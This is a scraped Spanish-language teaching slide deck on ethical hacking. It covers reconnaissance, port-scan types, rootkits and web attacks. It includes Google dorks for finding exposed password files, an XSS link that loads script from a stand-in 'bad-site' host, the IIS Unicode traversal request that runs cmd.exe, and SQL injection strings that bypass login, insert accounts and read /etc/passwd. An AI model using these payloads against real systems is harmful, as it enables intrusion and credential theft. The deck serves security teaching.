Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores...
-
Upload
nguyennguyet -
Category
Documents
-
view
224 -
download
0
Transcript of Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores...
![Page 1: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/1.jpg)
Ethical Hacking
Reinaldo Mayol Arnao
![Page 2: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/2.jpg)
![Page 3: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/3.jpg)
} El levantamiento comienza por:
1. Búsqueda del nombre de dominio (Ej. empresa.com)
2. Localización física de la empresa, direcciones,
teléfonos, direcciones de correo electrónico
![Page 4: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/4.jpg)
3. Búsqueda de información de la empresa en google y otros
motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como www.archive.org
4. Búsqueda de Intranet, proyectos, versiones beta de la empresa,
conseguir acceso a la Intranet puede brindar información valiosa de la misma.
www2.empresa.com, etc. 5. Existen herramientas como DNS Enumerator, Spider Foot, DNS
Stuff que ayudan a realizar la busque
![Page 5: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/5.jpg)
Práctica:Archive.org Ambiente: Cualquiera Vaya al sitio Web: www.archive.org, utilice la herramienta para buscar versiones anteriores de su sitio web.
![Page 6: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/6.jpg)
21 Febrero del 2006
![Page 7: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/7.jpg)
Práctica:dnsstuff Ambiente: Cualquiera
![Page 8: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/8.jpg)
} En esta etapa el atacante intenta descubrir, enumerar e inventariar los equipos de la red a la que quiere acceder.
} Específicamente, el atacante desea recolectar información acerca de las direcciones IP, su sistema operativo, la arquitectura de sistemas de la víctima y los servicios que cada equipo de su red está ejecuta.
![Page 9: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/9.jpg)
![Page 10: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/10.jpg)
![Page 11: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/11.jpg)
![Page 12: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/12.jpg)
} Syn Stealth o Half Open: ◦ Se envía un paquete SYN a un puerto del equipo, lo
que sugiere que se está solicitando una conexión. ◦ Si el puerto está abierto enviará un paquete SYN/
ACK. ◦ Por el contrario, si el puerto está cerrado enviará
un paquete RST. } La ventaja de este tipo de escaneo es que muy pocos
sitios registran este tipo de actividad.
![Page 13: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/13.jpg)
} FIN Scan: ◦ Sólo funciona con equipos con TCP/IP desarrollado
de acuerdo al RFC 793, si se realiza contra Windows la respuesta será que todos los puertos están cerrados.
◦ El escaneo consiste en enviar un FIN, si el puerto
está abierto se recibirá NO RESPONSE, si el puerto está cerrado se recibirá un RST/ACK.
![Page 14: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/14.jpg)
} NULL Scan: ◦ Este tipo de rastreo sólo funciona con equipos con
TCP/IP desarrollado de acuerdo al RFC 793. Si se realiza contra Windows la respuesta será que todos los puertos están cerrados.
◦ El escaneo consiste en enviar un paquete sin
banderas configuradas, si el puerto está abierto se recibirá NO RESPONSE, si el puerto está cerrado se recibirá un RST/ACK
![Page 15: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/15.jpg)
} Window Scan: ◦ Este rastreo es similar al ACK, la detección se realiza
revisando el tamaño de las ventanas. } ICMP Echo Scan: ◦ Esta opción no es realmente un tipo de rastreo dado que
ICMP tiene abstracción de puertos, pero es útil para determinar qué equipos de una red están arriba haciendo ping.
} List Scan: ◦ Este tipo de escaneo simplemente genera e imprime la
lista de IP/nombres sin hacer ping o escaneo de puerto. En realidad se realiza una resolución de nombres (DNS)
![Page 16: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/16.jpg)
} Bounce Scan: ◦ Este tipo de rastreo utiliza la vulnerabilidad de los
servidores FTP para los ataques de bounce. Esta vulnerabilidad permite que una persona solicite al servidor FTP abrir una conexión con un tercero en un puerto en particular. Cómo el atacante puede utilizar el FTP también podrá recibir los resultados. El ataque bounce es similar a la usurpación de IP (IP Spoofing). ◦ El anonimato del atacante se mantiene. ◦ También es bueno evadiendo cortafuegos y permite
acceso a redes locales.
![Page 17: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/17.jpg)
} Reverse Ident Scan: ◦ El protocolo Ident permite que se muestren los
usuarios dueños de procesos conectados vía TCP, incluso si ese proceso no comenzó la conexión.
◦ De esta forma una conexión puede establecerse por
HTTP y luego utilizar ident para identificar qué servidor está corriendo como root.
![Page 18: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/18.jpg)
} RPC Scan: ◦ Este método funciona en combinación con otros
tipos de rastreos de puertos. ◦ Funciona escaneando todos los puertos TCP/UDP y
luego los inunda con un programa de SunRPC con comandos nulos en un intento de determinar si son puertos RPC, si lo son, trata de determinar qué versión tienen y programas están sirviendo.
![Page 19: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/19.jpg)
} Blaster Scan: ◦ Este es un rastreo de puertos TCP sistemas para
basados en *nix. ◦ Realiza ping a los equipos para determinar
conectividad, escanea segmentos de red, accesos anónimos a servidores FTP, vulnerabilidades CGI, POP3 y FTP (para ataques de fuerza bruta).
![Page 20: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/20.jpg)
![Page 21: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/21.jpg)
![Page 22: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/22.jpg)
Muchas aplicaciones mal instaladas, o instaladas por omisión, errores de configuración, etc, terminan publicando información que no debería ser publica en Internet. Esta información es indexada por los buscadores y por lo tanto, terminan siendo disponibles para el ethical hacker o para el criminal informáAco. En parAcular, las capacidades avanzadas de búsqueda de google son extraordinariamente flexibles. Las búsquedas comunes y corrientes conAenen texto a ser buscado en el cuerpo de la página Web. Sin embargo, las búsquedas avanzadas pueden especificar Apos de archivos, textos en disAntas partes de la página no solo el cuerpo, patrones de números, firmas de aplicaciones, etc. Algunos modificadores de este Apo son: " Inurl: Texto en el URL de la pagina. " Intext: Texto libre. " Site: Especifica un dominio. " Filetype: Tipo de archivos a buscar.
Google Hacking
![Page 23: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/23.jpg)
Google Hacking Obtener Cuentas: inurl:account filetype:xls Obtener passwords: inurl:passwords filetype:xls Obtener info sobre sistemas: inAtle:"sysinfo * " intext:"Generated by Sysinfo * wriUen by The Gamblers." Busqueda de disposiAvos: inurl:indexFrame.shtml Axis (WebCams) intext:centreware inurl:status (Printers) El siAo web donde todo esto ocurre se llama the Google Hacking Database:
hUp://johnny.ihackstuff.com/ghdb.php
![Page 24: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/24.jpg)
Ejecutar un ataque de transferencia de zona con nslookup. " nslookup " set type=NS " dominio.com " server servidordns.dominio.com " set type=any " ls –d dominio.com Todos los dominios bien configurados deben responder con un “transacción rechazada”. En caso contrario esta secuencia de comandos nos devuelve una lista de hosts con sus nombres de acuerdo a los records del servidor DNS que fue preguntado. Algunos servidores DNS también pueden responder con datos incorrectos para despistar atacantes. Salvo casos muy especiales, las transferencias de zonas no deberían permiArse a la internet en general.
Técnica de Zone Transfer
![Page 25: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/25.jpg)
} Otro camino común utilizado en esta etapa es la búsqueda de vulnerabilidades que puedan ser explotables.
} Existen innumerables herramientas que pueden ser utilizadas para este fin.
![Page 26: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/26.jpg)
Escondiendo información mediante “Streams Alternos”. Los “streams alternos NTFS” o “named streams” o ADS (Alternate Data Streams) son una caracterísAca del sistema de archivos NTFS poco conocida pero muy úAl. Si comparamos a NTFS con otros filesystems como FAT, NTFS expande significaAvamente el concepto de un archivo como una simple porción de datos con un nombre.
El “stream sin nombre” es un elemento obligatorio y siempre
esta presente. Si intentamos crear un “stream alterno” en un archivo
que no existe, el filesystem automáAcamente creara un
“stream sin nombre” con longitud zero. Si tratamos de borrar un
“stream sin nombre”, el sistema lo considera como una solicitud de borrar todo el archivo y por lo tanto todos los otros “streams
alternos” serán eliminados.
![Page 27: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/27.jpg)
Escondiendo información mediante “Streams Alternos”.
Cuando un programa abre un archive común y corriente, en realidad esta abriendo el “stream sin nombre”. Para especificar un “stream alterno” simplemente hace falta agregar el símbolo “:” al nombre del archivo. Por ejemplo, nombredearchivo.txt especifica el “stream sin nombre” del archivo (o dependiendo del contexto, todo el archivo), mientras que nombredearchivo.txt:stream especifica el “stream alterno” de nombre stream. Un directorio también puede tener “streams alternos”, sin embargo, el directorio no puede tener “streams sin nombre”. Cualquier intento de acceder al “stream sin nombre” de un directorio resulta en un error. Como el símbolo “:” también se usa para especificar las letras de unidades lógicas se presenta una ambigüedad al uAlizar por ejemplo A:B. El sistema resuelve esta ambigüedad asumiendo siempre que se trata de unidades de disco. Cuando se desea representar un archivo, se debe especificar con el path completo aunque sea relaAvo, por ejemplo: .\A:B.
![Page 28: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/28.jpg)
} Proxy: es un servidor que puede ser utilizado cómo intermediario para conexiones con otros equipos.
} Es común utilizar servidores distribuidos por varios países de forma es esconder el origen real de la intrusión.
![Page 29: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/29.jpg)
![Page 30: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/30.jpg)
} Tor es una de las herramientas de proxy-socks mas conocidas y utilizadas.
} Funciona re-direccionando todo el tráfico a un servidor anónimo y cifrando los datos entre ese servidor tor y el cliente ( no entre el servidor tor y el destino)
![Page 31: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/31.jpg)
![Page 32: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/32.jpg)
} El término enumeración se emplea para designar el proceso de extracción de cuentas de usuario, privilegios de las cuentas, nombres de equipo, etc.
} Algunas técnicas de enumeración para la extracción de usuarios:
} SNMP } Utilizando los IDs de correo electrónico } Extrayendo información con usuarios por omisión } Fuerza bruta contra directorio activo.
![Page 33: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/33.jpg)
} Luego de lograr el acceso el hacker tratará de escalar privilegios y ejecutar aplicaciones o exploits de forma encubierta.
} Una forma común de encubrimiento son los rootkits.
Los rootkits se instalan en el kernel y tienen la habilidad de esconderse y encubrir sus actividades.
![Page 34: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/34.jpg)
} Cuando se instala un rootkit se reemplazan llamados del
sistema operativo por versiones o rutinas modificadas que contienen la ejecución de script o aplicación adicional al llamado natural que realiza la función.
} Un rootkit puede: Esconder procesos, archivos, entradas en
el registro interceptar comandos, solicitar debug (causando los famosos pantallazos azules), redirigir archivos .
![Page 35: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/35.jpg)
![Page 36: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/36.jpg)
![Page 37: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/37.jpg)
Ethical Hacking
![Page 38: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/38.jpg)
![Page 39: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/39.jpg)
![Page 40: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/40.jpg)
} Obtención de identidades mediante ataques de “hombre en el medio”.
} Envenenamiento del Cache del DNS. } Explotando errores de los programas. } Explotando configuraciones incorrectas. } Envenenamiento de URL } Inyecciones SQL } DoS
![Page 41: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/41.jpg)
} Cross-Site Scripting ◦ En HTML, existen caracteres “especiales”, que se
utilizan para que el servidor y los navegadores puedan diferenciar entre texto normal ( mostrado) y elementos que proporcionan diferentes funcionalidades. ◦ Cross-Site Scripting es una vulnerabilidad que
puede ser explotada mediante la inserción de caracteres especiales en la comunicación cliente-servidor, en forma de scripts, contentivo de código malicioso.
![Page 42: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/42.jpg)
} <A HREF= “http://sitio.com/comment.cgi? mycomment=<SCRIPT>codigo-malicioso</SCRIPT>"> Click here</A>
} <A HREF= “http://sitio.com/comment.cgi?
mycomment=<SCRIPT SRC=‘http://bad-site/badfile'> </SCRIPT>"> Click here</A>
![Page 43: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/43.jpg)
} Imagine que ud. ha recibido un correo electrónico con una invitación a un paseo. Para ir al paseo, ud. debe llenar un formulario con sus datos.
} El email tiene un link que amablemente lo llevará al formulario.
} El link tiene la forma http://www.elpaseosoñado.com } El código del link dice: www.victima.com/default.asp?name=<script>evilScript()</script>
![Page 44: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/44.jpg)
Usuario Confiado…
Server Vulnerable Usuario Envía Solicitud
Server Devuelve HTML con código malicioso incluido ( el server cree que es el nombre del usuario)
Usuario confiado pierde el Control de su máquina, el código malicioso Se lo ha entregado a un extraño
![Page 45: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/45.jpg)
} Esta vulnerabilidad permite a usuarios externos obtener acceso a máquinas corriendo IIS 4.0 o IIS 5.0 a través de URL’s “malformadas”
} Ej: ◦ Microsoft IIS efectúa una verificación de seguridad sobre
cada CGI URL ejecutado para asegurar que el requerimiento no use ninguna secuencia ‘../’ ◦ Pero.. ◦ Dado que la codificación Unicode del caracter ‘/’ es
‘%c0%af’, si se reemplaza la secuencia ‘../’ por ‘..%c0%af’ este no será rechazado por la verificación inicial, ya que dicho proceso no encuentra ninguna ocurrencia de los caracteres ‘../’ sólo verá una secuencia ‘..%c0%af’ válida.
GET/scripts/..%c0%af/winnt/system32/cmd.exe?/ c+dir=c:\ HTTP/1.0
![Page 46: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/46.jpg)
} ‘%c0 es el código de la tabla Basic Latin
El número más grande
es %7f ( 127 D)
Pero, %af > %7f, lo Que significa que el sistema
“da la vuelta” ,%80-%af=%2f
%2F
![Page 47: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/47.jpg)
} RPC DCOM ◦ RPC (Remote Procedure Call o Llamada de
Procedimiento Remoto), es un protocolo utilizado por Windows, que proporciona un mecanismo de comunicación entre procesos internos, y que permite que un programa ejecutándose en una computadora pueda acceder a los servicios de otra, de manera transparente para el usuario
![Page 48: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/48.jpg)
◦ Windows posee un servicio llamado DCOM (Distributed Component Object Model o Modelo de Objeto Componente Distribuido), que permite a los objetos COM comunicarse entre a través de la red. ◦ Un atacante puede utilizar los puertos TCP/UDP 135
(RPC), 139 y 445 (NetBIOS), 593 (RPC/http), o cualquier puerto habilitado por IIS para alcanzar los servicios DCOM vulnerables.
![Page 49: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/49.jpg)
◦ Existen innumerables vulnerabilidades descritas y explotables utilizando los servicios DCOM.
◦ Un atacante que tenga éxito en aprovecharse de
estas vulnerabilidades, podría ejecutar un código capaz de tener todos los privilegios del sistema local de un sistema afectado.
![Page 50: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/50.jpg)
} reinaldo@guije:~$ echo -e "GET / HTTP/1.0\n\n" | nc -vv www.XXXXXXX.COM 80
XXXXXXX.com.ve [XXX.XXX.XXX.116] 80 (www) open
HTTP/1.1 200 OK Date: Fri, 21 Nov 2008 02:21:22 GMT Server: Apache/2.0.53 (Ubuntu) PHP/4.3.10-10ubuntu4.3 X-Powered-By: PHP/4.3.10-10ubuntu4.3 Connection: close Content-Type: text/html
![Page 51: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/51.jpg)
} Una vulnerabilidad de inyección SQL puede producirse cuando, un gestor mal programado facilita datos en una base de datos de consulta sin la validación de la entrada.
} <form method="post" action="process_login.php"> <input type="text" name="username"> <input type="password" name="password"> </ form>
} Imagine que pasa mediante el browser la siguiente sentencia: ◦ https://www.XXX.com/process_login.php?
name=reinaldo%27%3b%20-- El “- -” actúa en SQL como
comentario, lo que implicará que le servidor ignore el resto de la
sentencia
![Page 52: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/52.jpg)
![Page 53: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/53.jpg)
} https:www.XXX.com/process_login.php?name=reinaldo& password=´%20OR%20´’%3d´
https:www.XXX.com/process_login.php?name=&password=%27;+INSERT+INTO+userlist+%28uid%2cpassword%29+VALUES%28%27reinaldo%27%2c%27mayol%27%29,--+
SELECT nombre FROM usuarios WHERE uid=reinaldo AND pwd=´´ OR´ ´=´ ´:
SELECT nombre FROM usuarios WHERE uid=‘’ AND pwd=´´; INSERT INTO userlist
(uid.password) VALUES (‘reinaldo’ . ‘mayol’)--
![Page 54: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/54.jpg)
} https://www.xxx.xxx/vuln.cgi?param=%27’;+CREATE+TABLE+mia+%28bar+TEXT%29;
} https://www.xxx.xxx/vuln.cgi?param=%27’;+LOAD
+DATA+INFILE+%27%2fetc%2f%passd/27+INTO+TABLE+mia;
} https://www.xxx.xxx/vuln.cgi?param=%27’;+SELECT
+%2a+FROM+mia
CREATE TABLE mia (bar TEXT)
LOAD DATA INFILE ‘/etc/passwd’ INTO TABLE mia
SELECT * FROM mia
![Page 55: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/55.jpg)
Robo de Contraseñas
![Page 56: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/56.jpg)
Auten:cación " El modelo más común de auten:cación
permite iden:ficar a un usuario, una aplicación o a un servicio u:lizando una pareja de ID-‐ Clave
" En un contexto más amplio existen varios
modelos adicionales de auten:cación: – Kerberos – Cer:ficación Digital
![Page 57: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/57.jpg)
Esquemas de Auten:cación " Auten:cación HTTP
• Auten:caciónBasica • Digest Auten:cación
" Auten:cación Windows (NTLM) " Auten:cación con Cer:ficados Digitales o
Claves " RSA Secure Token " Biometría
